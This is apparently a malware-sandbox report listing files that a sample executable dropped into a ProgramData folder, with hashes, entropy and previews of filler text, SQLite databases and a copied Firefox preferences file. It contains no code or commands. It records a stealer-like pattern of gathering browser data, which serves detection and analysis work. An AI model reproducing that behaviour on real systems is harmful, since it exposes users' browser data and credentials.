                                                                                                                                                                                                                                                                                    Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\KN7Y5F

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                                                                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                                                                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                                                                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                                                                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\L6XBA1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                                                                    MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                                                                    SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                                                                    SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                                                                    SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\NYMYCB

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\P8Q1VAS26

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\P8QIEK

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                    MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                    SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                    SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                    SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\PHLXTJ

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                                                                    MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                                                                    SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                                                                    SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                                                                    SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\RIWBA1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                    MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\RQ9ZCB

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\S0RQI5

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\T2VKNG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.687055908915499
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                                                                                                                                                                                                                                                    MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                                                                                                                                                                                                                                                    SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                                                                                                                                                                                                                                                    SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                                                                                                                                                                                                                                                    SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                                                                                                                                                                                                                                                    Malicious:false
